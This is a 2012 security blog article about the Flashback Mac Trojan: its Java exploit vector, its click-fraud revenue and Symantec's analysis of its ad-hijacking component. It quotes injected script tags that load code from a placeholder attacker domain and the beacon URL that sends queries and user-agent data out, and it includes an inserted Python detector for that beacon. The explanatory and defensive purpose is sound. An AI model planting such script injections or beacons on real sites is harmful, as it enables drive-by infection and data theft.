Flashback Trojan, a business opportunity for all

Pierluigi Paganini May 02, 2012

Many people who do not work in our sector are asking me two questions with increasing frequency:

  • Can a virus infect a Mac?
  • Is it possible to monetize malware development, and if so, how?

My answers are obvious: no software system can be assumed free of bugs and vulnerabilities. To those who asked me these questions I recently offered as an example the Flashback Trojan and the related botnet known as Flashfake. Apple isn't immune to malware; its code has vulnerabilities like anyone else's, and its products have been exploited at the various security contests.

Flashback first appeared in September 2011, disguised as an Adobe Flash Player installer and mimicking the Flash Player layout. Once installed, it searches for user names and passwords stored on the victim's machine. The Trojan was built to run a click-fraud scam by hijacking search engine results inside the victim's browser, and it also steals banking and login credentials. Of course, once a system is infected it can be enrolled in a botnet and cause far greater damage: the botnet built on Flashback was designed by cyber criminals to run a click-fraud scam that exploits the pay-per-click campaigns of advertising companies.

Cybercrime is showing growing interest in activities that promise high profits at low risk, such as cyber scams, digital identity theft and similar frauds. From this point of view Apple and its products represent a great business opportunity, all the more so because the belief that Apple products are immune to malware is widespread among its users, a mistaken conviction that exposes them to serious risks.

The contagion

The Flashback Trojan, also known as OSX.Flashback.K, was distributed by exploiting the Oracle Java SE Remote Java Runtime Environment Code Execution Vulnerability (CVE-2012-0507), which Oracle patched in February. The main problem for the Mac platform was the long interval between the date Oracle issued the patch and the date it became available for Apple products: around 6 weeks, during which the Flashback Trojan infected Macs on a large scale.

The Flashback creators took advantage of the gap between Oracle's and Apple's patches by compromising vulnerable websites running WordPress and Joomla and injecting malicious script snippets such as:

<script src="[ATTACKER_DOMAIN].rr.nu/mm.php?d=x1"></script>
<script src="[ATTACKER_DOMAIN].rr.nu/nl.php?p=d"></script>

When a user visited one of these infected websites on an unpatched Mac, OSX.Flashback.K was installed.

The Flashback Business

Even if the Flashback Trojan by itself does not represent a serious concern for the Mac world, we must consider its collateral effects, which are far from negligible and which have turned the malware into a business opportunity for both cyber criminals and security firms.

Let's start with the security firms, which have historically struggled to penetrate the Mac world because of the assumptions held by Apple's users. The media coverage of the virus has fortunately overturned that conviction, suddenly pushing up demand for antivirus software for Apple systems. The major computer security companies responded promptly, supplying what the market was asking for; in this case the news acted as a driving force for a segment of the industry that had struggled to take off.

That is the first economic effect of the cyber threat; the second is the profit the crime industry is still extracting from it. To explain it I refer to a study by Symantec experts who analyzed the Flashback malware. The security specialists found an ad-clicking component used by the malware designers to generate revenue.

“Flashback specifically targets search queries made on Google and, depending on the search query, may redirect users to another page of the attacker’s choosing, where they receive revenue from the click,” Symantec wrote in a blog post. “Google never receives the intended ad click.”

This scheme gives the creators a highly profitable revenue stream, one already seen in similar scams. Last August the W32.Xpaj.B Trojan generated daily profits of $450 from 25,000 infected PCs. Scaling those figures to the size of the Flashback infection, the experts estimated that with a botnet of 650,000 infected machines the creators of Flashback could earn revenue of $10,000 per day.

The ad-clicking component

According to Symantec, what is actually worrying about the Trojan is that Flashback's ad-clicking component is loaded into common browsers such as Chrome, Safari and Firefox.

The ad-clicking component can intercept all GET and POST requests directly from the browser. It parses out the requests resulting from an ad click on Google Search and checks whether the request is on a whitelist. If not, it forwards the request to the malicious server in the following form:

http://[FLASHBACK_DOMAIN]/search?q=[QUERY]&ua=[USER AGENT]&al=[LANG]&cv=[VERSION]
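As an added illustration from the defender's side (not code from the original post or from Symantec), the following Python check flags proxy-log requests that carry the beacon shape above while ignoring the same /search?q= path on real search engines; the log layout, host names and search-engine allow-list are constructed assumptions.

```python
from urllib.parse import urlsplit, parse_qs

# Beacon shape described by Symantec:
#   http://[FLASHBACK_DOMAIN]/search?q=[QUERY]&ua=[USER AGENT]&al=[LANG]&cv=[VERSION]
BEACON_PATH = "/search"
BEACON_PARAMS = {"q", "ua", "al", "cv"}
# Real search engines also serve /search?q=..., so the host decides
# (constructed allow-list; extend it with what your proxy actually sees).
SEARCH_ENGINE_DOMAINS = ("google.com", "bing.com", "yahoo.com")

def is_search_engine(host):
    """True if host is a known search engine domain or one of its subdomains."""
    return any(host == d or host.endswith("." + d) for d in SEARCH_ENGINE_DOMAINS)

def is_flashback_beacon(url):
    """True if url carries the beacon path and the full parameter set
    towards a host that is not a legitimate search engine."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if parts.path != BEACON_PATH or is_search_engine(host):
        return False
    params = parse_qs(parts.query, keep_blank_values=True)
    return BEACON_PARAMS.issubset(params)

def scan_proxy_log(lines):
    """Return (client_ip, url) for every request matching the beacon.
    Assumed (constructed) log layout: timestamp client_ip method url status"""
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 5:
            continue
        client_ip, method, url = fields[1], fields[2], fields[3]
        if method in ("GET", "POST") and is_flashback_beacon(url):
            hits.append((client_ip, url))
    return hits

# Constructed sample lines (not real traffic); only the second is a beacon.
SAMPLE_LOG = """\
1335961200.123 10.0.0.12 GET http://www.google.com/search?q=toys 200
1335961201.456 10.0.0.12 GET http://c2.example.invalid/search?q=toys&ua=Mozilla%2F5.0&al=en&cv=1.0 200
1335961202.789 10.0.0.15 POST http://intranet.example.invalid/search?q=report 200
"""

if __name__ == "__main__":
    for ip, url in scan_proxy_log(SAMPLE_LOG.splitlines()):
        print("possible Flashback beacon from", ip, "->", url)
```

The parameter set alone is not proof of infection, so treat a hit as a lead to correlate with the preceding Google ad click from the same client.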

The following picture shows the server's response, RC4-decrypted and then base64-decoded:

[Figure: decrypted Flashback server response for a hijacked ad click]

This hijacked ad click stems from a user searching for "toys". Note the presence of the word "BIDOK", which has been identified as a Flashback command. The value of 0.8 cents for the click and the redirection URL are also clearly visible.

It's easy to imagine how profitable such a scam can be. The malware's creators are simply watching their profits grow, click after click.

Pierluigi Paganini
